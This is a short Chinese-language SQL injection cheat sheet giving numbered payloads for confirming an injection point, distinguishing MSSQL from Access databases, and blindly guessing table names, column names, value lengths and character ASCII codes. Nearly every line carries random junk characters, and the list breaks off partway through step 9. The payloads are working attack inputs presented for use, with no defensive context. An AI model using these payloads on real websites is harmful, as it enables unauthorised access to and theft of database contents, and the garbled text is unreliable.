1.判断是否有注入;and 1=1 ;and 1=2 H1@"Yg8
2.初步判断是否是mssql ;and user>0 0r@rXwz
<>R7G)w
F
3.注入参数是字符'and [查询条件] and ''=' kxO$Uk&TX
:Rq D0>1
4.搜索时没过滤参数的'and [查询条件] and '%25'=' *R:nB)(6<
5|/vc*m_0'
5.判断数据库系统 m1cyCD
/)G9w]|T
;and (select count(*) from sysobjects)>0 mssql 7z$+ *]9-
v:+se6HY?p
;and (select count(*) from msysobjects)>0 access 6$zUFIk
]F_u
S !e0:
qlzL<
6.猜数据库 ;and (select Count(*) from [数据库名])>0 K[9 <a>D`
{<i!Pm
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 }Jc^p
CUtk4;^y#
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 II2oV}7?
;S%wPXj&
9.(1)猜字段的ascii值(access) :r6
bw
>,y QG+
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 c[YC}@l%a
Xak~He
(2)猜字段的ascii值(mssql) $@<